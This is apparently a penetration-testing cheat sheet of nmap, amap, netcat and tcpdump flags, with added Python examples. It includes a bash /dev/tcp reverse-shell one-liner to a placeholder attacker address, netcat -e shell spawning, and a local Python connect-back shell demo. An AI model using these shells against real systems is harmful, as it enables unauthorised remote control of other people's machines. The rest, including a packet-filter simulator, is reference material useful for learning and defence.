nmap
-Pn  don't ping, just scan (treat every host as up; older versions spell it -PN)
-sS  SYN scan (half-open / "stealth" scan; needs raw sockets, so root)
-sT  TCP connect scan (full three-way handshake; the default when not root)
-sU  UDP scan
-sV  service/version detection (probe the open ports and match the banners)
-p   ports to scan, e.g. -p 22,80,443 or -p 1-1024 (-p- for all 65535)
--packet-trace  show every packet sent and received
-sn  ping scan: host discovery only, no port scan (older versions spell it -sP)
-n   don't resolve names
--badsum  send packets with bogus TCP/UDP checksums; real hosts drop these, so any reply comes from a firewall or IDS that didn't verify the checksum
--reason  show why each port is reported open/closed/filtered (syn-ack, reset, no-response, ...)
-O   OS fingerprint
amap -bqv  print banners (-b), quiet (-q: don't report closed ports), verbose (-v); amap identifies the application by its responses, whatever port it sits on
netcat
-d   run detached from the console (background mode; Windows nc.exe only)
-l   listen for an inbound connection instead of connecting out
-L   listen "harder": re-listen after the client disconnects (Windows nc.exe only)
-p   local port to listen on (or the source port when connecting out)
-e   run whatever follows once a connection is made, with its stdin/stdout/stderr on the socket; typically cmd.exe or /bin/sh to get a shell. Only present in builds compiled with GAPING_SECURITY_HOLE; many distro builds (OpenBSD nc among them) leave it out, so check nc -h first
bash reverse shell for when the target has no nc -e (bash only, uses its built-in /dev/tcp; catch it with nc -l -p [yourport] on [yourip]):
/bin/bash -i > /dev/tcp/[yourip]/[yourport] 0<&1 2>&1
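What -e does under the hood, and what the /dev/tcp one-liner reproduces with shell redirections, as an added Python example rather than anything from the post: a listener playing nc -l -p, and a connect-back that starts a shell with descriptors 0, 1 and 2 attached to the socket. Both ends run in one process on 127.0.0.1; the spawned program is /bin/sh (assumed to exist, so POSIX only) and the function names are mine.

```python
import socket
import subprocess


def listen(bind_host="127.0.0.1"):
    """nc -l -p <port>: bind and listen. Port 0 lets the OS pick a free port for the demo."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def connect_back_exec(host, port, argv):
    """nc <host> <port> -e <cmd>: connect out, then start cmd with fds 0, 1, 2 on the socket.

    Popen dup2()s the socket descriptor onto the child's stdin/stdout/stderr, which is
    exactly what the bash one-liner's redirections (> /dev/tcp/..., 0<&1, 2>&1) achieve.
    """
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    proc = subprocess.Popen(argv, stdin=fd, stdout=fd, stderr=fd)
    sock.close()                      # the child now owns its own copies of the descriptor
    return proc


def run_demo():
    """Listener and connect-back in one process: send one command down the socket, read the output."""
    srv, port = listen()
    proc = connect_back_exec("127.0.0.1", port, ["/bin/sh"])   # assumption: POSIX sh present
    conn, _ = srv.accept()
    srv.close()
    with conn:
        conn.sendall(b"echo shell-ok; exit 0\n")
        conn.shutdown(socket.SHUT_WR)   # EOF on the shell's stdin, so it exits even without 'exit'
        out = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:               # shell exited and its end of the socket closed
                break
            out += chunk
    rc = proc.wait(timeout=10)
    return out.decode(), rc


if __name__ == "__main__":
    output, status = run_demo()
    print(repr(output), status)
```

The shell never sees a terminal here, which is why the one-liner uses bash -i: an interactive shell keeps reading after each command and prints a prompt, whereas a plain sh on a socket behaves like a script fed from stdin.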
tcpdump
-n use numbers instead of names for machines
-nn use numbers instead of name for machines and ports
-i [int] sniff on interface. use -D to list interfaces
-v verbose
-w dump to file
-x print hex
-X print ascii and hex
-s [snaplen] capture this many bytes of each packet; old versions default to 68 (headers only, payload truncated), newer versions capture whole packets by default; -s 0 means full packets
-p don't put the interface in promiscuous mode (only traffic addressed to this host)
filter expression primitives (BPF; combine with and / or / not):
ether, ip, ip6, arp, rarp, tcp, udp   protocol
host [addr]       traffic to or from addr
net [cidr]        traffic to or from a network, e.g. net 10.0.0.0/24
port [n]          source or destination port n
portrange [a-b]   ports a through b
src / dst         qualifiers restricting host/net/port to one direction, e.g. src host 10.0.0.5, dst port 80
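How the filter primitives above actually match, as an added example and not anything from the post or from tcpdump itself: a minimal Python decoder for Ethernet/IPv4/TCP/UDP frames plus functions mirroring host, net, port, portrange, the src/dst qualifiers and and/or/not, run over four constructed frames. The addresses, ports and frame contents are made up for the demo (documentation ranges), IP and TCP checksums are left at zero, and the function names are my own, not tcpdump's.

```python
import ipaddress
import struct


def build_frame(src_ip, dst_ip, l4proto, sport, dport, payload=b""):
    """Construct an Ethernet/IPv4/{TCP,UDP} frame (demo data; checksums left at zero)."""
    if l4proto == "tcp":
        # src, dst, seq, ack, data offset (5 words), flags (SYN), window, csum, urg
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 65535, 0, 0) + payload
        pnum = 6
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
        pnum = 17
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, pnum, 0,
                     ipaddress.IPv4Address(src_ip).packed, ipaddress.IPv4Address(dst_ip).packed)
    eth = b"\x00" * 12 + b"\x08\x00"               # dummy MACs, ethertype IPv4
    return eth + ip + l4


def decode(frame):
    """Pull out just the fields the filters need: addresses, protocol, ports."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return {"ip": False}                       # not IPv4: only link-level filters apply
    ihl = (frame[14] & 0x0F) * 4
    pnum = frame[23]
    pkt = {"ip": True,
           "src": ipaddress.IPv4Address(frame[26:30]),
           "dst": ipaddress.IPv4Address(frame[30:34]),
           "tcp": pnum == 6, "udp": pnum == 17}
    if pnum in (6, 17):                            # ports sit at the same offset in TCP and UDP
        off = 14 + ihl
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", frame[off:off + 4])
    return pkt


def _match(p, direction, pred, src_key, dst_key):
    """Apply a src/dst qualifier; unqualified means either end may match (tcpdump semantics)."""
    if direction == "src":
        return pred(p[src_key])
    if direction == "dst":
        return pred(p[dst_key])
    return pred(p[src_key]) or pred(p[dst_key])


# Filter primitives. direction is None (either way), "src" or "dst".
def host(addr, direction=None):
    a = ipaddress.IPv4Address(addr)
    return lambda p: p["ip"] and _match(p, direction, lambda v: v == a, "src", "dst")


def net(cidr, direction=None):
    n = ipaddress.IPv4Network(cidr, strict=False)
    return lambda p: p["ip"] and _match(p, direction, lambda v: v in n, "src", "dst")


def portrange(lo, hi, direction=None):
    return lambda p: "sport" in p and _match(p, direction, lambda v: lo <= v <= hi, "sport", "dport")


def port(n, direction=None):
    return portrange(n, n, direction)


def proto(name):                                   # "tcp", "udp" or "ip"
    return lambda p: bool(p.get(name))


def all_of(*fs):                                   # and
    return lambda p: all(f(p) for f in fs)


def any_of(*fs):                                   # or
    return lambda p: any(f(p) for f in fs)


def negate(f):                                     # not
    return lambda p: not f(p)


def apply_filter(expr, frames):
    """Return the indices of the frames the expression would let tcpdump print."""
    return [i for i, fr in enumerate(frames) if expr(decode(fr))]


# Constructed sample capture (made-up addresses from documentation ranges).
CAPTURE = [
    build_frame("10.0.0.5", "192.0.2.10", "tcp", 51000, 80),    # 0: client -> web server
    build_frame("192.0.2.10", "10.0.0.5", "tcp", 80, 51000),    # 1: web server -> client
    build_frame("10.0.0.7", "10.0.0.1", "udp", 5353, 53),       # 2: DNS query inside the LAN
    build_frame("198.51.100.9", "10.0.0.5", "tcp", 4444, 22),   # 3: inbound SSH from outside
]

if __name__ == "__main__":
    print("host 10.0.0.5                    ->", apply_filter(host("10.0.0.5"), CAPTURE))
    print("tcp and dst port 80              ->", apply_filter(all_of(proto("tcp"), port(80, "dst")), CAPTURE))
    print("src net 10.0.0.0/24              ->", apply_filter(net("10.0.0.0/24", "src"), CAPTURE))
    print("portrange 1-1024 and not port 80 ->",
          apply_filter(all_of(portrange(1, 1024), negate(port(80))), CAPTURE))
```

The point to take away is the unqualified case: "port 80" selects both directions of the web conversation, so to see only requests you need "dst port 80", and "host" or "net" on their own match a packet whichever end the address is on.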